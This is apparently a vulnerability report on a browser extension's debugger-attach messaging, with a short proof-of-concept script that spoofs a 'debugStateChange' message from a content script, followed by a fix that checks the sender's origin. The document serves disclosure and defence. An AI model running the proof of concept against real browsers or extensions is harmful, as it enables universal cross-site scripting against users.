Attack 1: An attacker-controlled website can gain access to the powerful extension debugger API, which allows for a UXSS without user approval, by abusing a compromised renderer. (This is a site isolation issue, see https://microsoftedge.github.io/edgevr/posts/deep-dive-into-site-isolation-part-2/#abusing-extensions-to-bypass-site-isolation or https://ndevtk.github.io/writeups/2023/08/18/extensions/)

Attack 2: It's not clear that clicking the extension icon may give a remote server permission to all websites, not just the trusted localhost debug server over a secure connection. (WAI?)

Repro steps:

Click the extension icon (Attack 2) or run the provided code in the content script context (Attack 1).

```js
chrome.storage.local.get(null, e => {
  // Leak current TabId
  let tabId;
  for (let item in e) {
    // appId is set by the attacker website
    if (!e[item].includes(appId.innerText)) continue;
    tabId = item.split('-')[0];
  }
  // No idea
  let attach = '["DebugStateChange","tabId",' + tabId + ',"newState","start-debugging"]';
  chrome.runtime.sendMessage(JSON.stringify({
    to: 'background',
    from: 'debuggerPanel',
    type: 'debugStateChange',
    body: attach
  }));
});
```

This could be fixed by checking that MessageSender.origin comes from the extension origin before attaching the debugger, as compromised renderers shouldn't be able to spoof the MessageSender.url, nor MessageSender.origin, as seen by a recipient of a chrome.runtime.sendMessage. See also the MessageSender documentation and content script security guidance. https://chromium.googlesource.com/chromium/src/+/master/docs/security/compromised-renderers.md#Messaging
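One way to implement the sender check proposed in the report, as an added example that is neither the extension's own background script nor the reporter's code. It assumes the message shape used by the exploit above (a JSON string with `to`, `from`, `type` and a positional `body` array); the extension id, the attacker origin and the sample sender objects are constructed for the example and are not captured from a real browser.

```javascript
// Added example, not the extension's own code. Assumption: the background
// script receives the message shape the exploit sends, i.e. a JSON string
// {to, from, type, body} whose body is the positional array
// ["DebugStateChange","tabId",<id>,"newState","start-debugging"].

// MessageSender.origin for any page packaged inside the extension (popup,
// devtools panel, options page). A content script sends with the *web page's*
// origin, and a compromised renderer cannot forge this field because the
// browser process fills it in.
function extensionOrigin(extensionId) {
  return 'chrome-extension://' + extensionId;
}

// True only when the sender is one of this extension's own pages.
function isTrustedSender(sender, extensionId) {
  if (!sender || sender.id !== extensionId) return false;            // other extension / unknown
  if (sender.origin !== extensionOrigin(extensionId)) return false;   // web page or content script
  // Belt and braces: the sender URL must also lie inside the extension package.
  if (typeof sender.url !== 'string' ||
      !sender.url.startsWith(extensionOrigin(extensionId) + '/')) return false;
  return true;
}

// Parse a debugStateChange request and decide whether to attach the debugger.
// Returns the tabId to attach to, or null when the request must be dropped.
function debuggerAttachTarget(rawMessage, sender, extensionId) {
  if (!isTrustedSender(sender, extensionId)) return null;
  let msg;
  try {
    msg = typeof rawMessage === 'string' ? JSON.parse(rawMessage) : rawMessage;
  } catch (err) {
    return null;
  }
  if (!msg || msg.to !== 'background' || msg.type !== 'debugStateChange') return null;
  let body;
  try {
    body = JSON.parse(msg.body);
  } catch (err) {
    return null;
  }
  if (!Array.isArray(body) || body[0] !== 'DebugStateChange') return null;
  const tabIdx = body.indexOf('tabId');
  const stateIdx = body.indexOf('newState');
  if (tabIdx < 0 || stateIdx < 0) return null;
  const tabId = body[tabIdx + 1];
  if (!Number.isInteger(tabId) || body[stateIdx + 1] !== 'start-debugging') return null;
  return tabId;
}

// Wiring into a real background page / service worker. Only runs inside an
// extension; in plain Node the `chrome` global does not exist and this is skipped.
if (typeof chrome !== 'undefined' && chrome.runtime && chrome.runtime.onMessage) {
  chrome.runtime.onMessage.addListener((message, sender) => {
    const tabId = debuggerAttachTarget(message, sender, chrome.runtime.id);
    if (tabId === null) return;          // spoofed, foreign or malformed: ignore
    chrome.debugger.attach({ tabId }, '1.3', () => {
      // start debugging here
    });
  });
}

// Constructed samples (hypothetical extension id and attacker origin).
const EXT_ID = 'abcdefghijklmnopabcdefghijklmnop';
const exploitMessage = JSON.stringify({
  to: 'background',
  from: 'debuggerPanel',
  type: 'debugStateChange',
  body: '["DebugStateChange","tabId",42,"newState","start-debugging"]'
});
// What the recipient sees when a content script (or compromised renderer) sends it:
const fromContentScript = {
  id: EXT_ID, origin: 'https://attacker.example', url: 'https://attacker.example/', tab: { id: 42 }
};
// What it sees when the extension's own devtools panel sends it:
const fromPanel = {
  id: EXT_ID, origin: 'chrome-extension://' + EXT_ID, url: 'chrome-extension://' + EXT_ID + '/panel.html'
};
```

The same message body is rejected from the content-script sender and accepted from the panel sender; the `from: 'debuggerPanel'` field is never consulted, because it is attacker-controlled, whereas `sender.origin` and `sender.url` are set by the browser process.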